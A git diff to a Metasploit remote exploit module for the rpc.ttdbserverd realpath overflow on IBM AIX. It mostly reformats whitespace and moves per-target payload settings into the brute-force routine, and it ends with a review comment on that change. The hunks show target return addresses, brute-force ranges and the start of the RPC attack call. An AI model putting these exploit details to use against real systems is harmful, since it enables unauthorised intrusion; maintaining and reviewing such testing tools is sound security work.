diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
index c7fc1cc0bc..44b2a65d06 100644
--- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
+++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
@@ -3,7 +3,7 @@
 ##

 ##
-# This file is part of the Metasploit Framework and may be subject to
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/projects/Framework/
@@ -40,9 +40,9 @@ class Metasploit3 < Msf::Exploit::Remote
 {
 'BadChars' => "\x00",
 },
- 'Targets' =>
+ 'Targets' =>
 [
- [
+ [
 'IBM AIX Version 6.1.4',
 {
 'Arch' => 'ppc',
@@ -50,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20099430+4096,
 'Addr1' => 0x2ff1ff50-8192,
 'AIX' => '6.1.4',
- 'Payload' => { 'AIX' => '6.1.4' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20099430-8192 },
@@ -59,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 6.1.3',
 {
 'Arch' => 'ppc',
@@ -67,7 +66,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20099280+4096,
 'Addr1' => 0x2ff1ffd0-8192,
 'AIX' => '6.1.3',
- 'Payload' => { 'AIX' => '6.1.3' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20099280-8192 },
@@ -76,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 6.1.2',
 {
 'Arch' => 'ppc',
@@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20099280+4096,
 'Addr1' => 0x2ff1ffd0-8192,
 'AIX' => '6.1.2',
- 'Payload' => { 'AIX' => '6.1.2' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20099280-8192 },
@@ -93,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 6.1.1',
 {
 'Arch' => 'ppc',
@@ -101,7 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20099280+4096,
 'Addr1' => 0x2ff1ffd0-8192,
 'AIX' => '6.1.1',
- 'Payload' => { 'AIX' => '6.1.1' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20099280-8192 },
@@ -110,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 6.1.0',
 {
 'Arch' => 'ppc',
@@ -118,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20099280+4096,
 'Addr1' => 0x2ff1ffd0-8192,
 'AIX' => '6.1.0',
- 'Payload' => { 'AIX' => '6.1.0' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20099280-8192 },
@@ -127,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7',
 {
 'Arch' => 'ppc',
@@ -135,7 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20096ba0+4096,
 'Addr1' => 0x2ff1ff14-8192,
 'AIX' => '5.3.9',
- 'Payload' => { 'AIX' => '5.3.9' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20096ba0-8192 },
@@ -144,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 5.3.10',
 {
 'Arch' => 'ppc',
@@ -152,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20096bf0+4096,
 'Addr1' => 0x2ff1ff14-8192,
 'AIX' => '5.3.10',
- 'Payload' => { 'AIX' => '5.3.10' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20096bf0-8192 },
@@ -161,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 5.3.9',
 {
 'Arch' => 'ppc',
@@ -169,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20096ba0+4096,
 'Addr1' => 0x2ff1ff14-8192,
 'AIX' => '5.3.9',
- 'Payload' => { 'AIX' => '5.3.9' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20096ba0-8192 },
@@ -178,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 5.3.8',
 {
 'Arch' => 'ppc',
@@ -186,7 +178,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20096c10+4096,
 'Addr1' => 0x2ff1ff98-8192,
 'AIX' => '5.3.8',
- 'Payload' => { 'AIX' => '5.3.8' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20096c10-8192 },
@@ -195,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'IBM AIX Version 5.3.7',
 {
 'Arch' => 'ppc',
@@ -203,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0x20096c10+4096,
 'Addr1' => 0x2ff1ff98-8192,
 'AIX' => '5.3.7',
- 'Payload' => { 'AIX' => '5.3.7' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0x20096c10-8192 },
@@ -212,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'Debug IBM AIX Version 6.1',
 {
 'Arch' => 'ppc',
@@ -220,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0xaabbccdd,
 'Addr1' => 0xddccbbaa,
 'AIX' => '6.1.4',
- 'Payload' => { 'AIX' => '6.1.4' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0xaabbccdd },
@@ -229,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
- [
+ [
 'Debug IBM AIX Version 5.3',
 {
 'Arch' => 'ppc',
@@ -237,7 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote
 'Ret' => 0xaabbccdd,
 'Addr1' => 0xddccbbaa,
 'AIX' => '5.3.10',
- 'Payload' => { 'AIX' => '5.3.10' },
 'Bruteforce' =>
 {
 'Start' => { 'Ret' => 0xaabbccdd },
@@ -252,8 +240,15 @@ class Metasploit3 < Msf::Exploit::Remote
 end

 def brute_exploit(brute_target)
+
+ if not @aixpayload
+ datastore['AIX'] = target['AIX']
+ @aixpayload = regenerate_payload.encoded
+ end
+
+ print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
+
 begin
- print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])

 sunrpc_create('tcp', 100083, 1)

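Review bot: In the last hunk, the block added at the top of brute_exploit assigns `datastore['AIX'] = target['AIX']` with no explanation, and that write replaces any AIX value already set on the module and stays in the datastore after the method returns. Since the per-target `'Payload' => { 'AIX' => ... }` entries are removed in the earlier hunks, a comment should record that this block now carries that setting, for example `# Generate the payload once, for the selected target's AIX level; later calls skip this block.` The guard `if not @aixpayload` reads more idiomatically as `unless @aixpayload`. The rest of brute_exploit lies outside the hunk, so whether the later code sends `@aixpayload` rather than `payload.encoded` cannot be confirmed from here.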